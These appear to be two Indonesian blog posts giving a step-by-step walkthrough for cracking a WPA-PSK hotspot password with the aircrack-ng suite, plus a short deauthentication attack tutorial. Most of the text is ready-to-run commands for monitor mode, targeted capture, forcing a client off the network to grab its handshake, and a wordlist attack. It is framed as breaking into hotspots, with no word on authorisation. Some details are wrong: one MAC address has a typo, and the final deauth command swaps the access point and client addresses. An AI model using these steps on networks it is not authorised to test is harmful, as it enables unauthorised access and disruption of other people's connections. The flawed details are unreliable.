./dev/sda /tmp/backtrack, Ppentest

crack wifi

Tool.

  1. PC linux mw binary .deb / .rpm suka-suka lo.
  2. Aircrack-ng, airmon-ng,aireplay-ng,airodump-ng.
  3. Wireless buat nangkep wifi nya.

Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0

Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
catatan : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
keterangan: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis
                   pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
keterangan: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket
                  handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
keterangan : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt

source “http://forum.electronicglobal.com/t80-tutorial-cracking-password-hotspot-wpa-psk-dengan-linux-backtrack”

Standard
Linux, Networking, Ppentest

Wireless Deauth Attack!!

#Step 1 : Aktifkan Mode Monitor airmon-ng start wlan0

Output : Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)

Ok kita telah sukses sejauh ini , output pada terminal menunjukan bahwa monitor mode telah di aktifkan pada interface mon0.

 

#Step 2 : Menangkap (dump) traffik pada akses point target dan lalu lintas paket data antara AP dan client yang sedang terkoneksi. “airodump-ng mon0”

Output:

#Step 3: HandShake

Tujuan kita dalam capturing ini sebenarnya adalah mencari handshake. Untuk mendapatkan nilai handshake kita harus mendiskoneksikan client yang sudah terkoneksi dengan baik ke AP target. ok saya tertarik pada client yang telah terkoneksi dengan AP dengan ssid ( ibteam-3g ) dengan bssid F4:EC:38:EB:FA:C6. Kita gunakan fasilitas aireply untuk melakukan deauth attack pada user dengan Mac .  1C:4B:D6:AB:85:8E  .

 

#Step 4 : Serang..!!!!!

aireplay-ng --deauth 1 -a 1C:4B:D6:AB:85:8E  . -c F4:EC:38:EB:FA:C6 mon0

Standard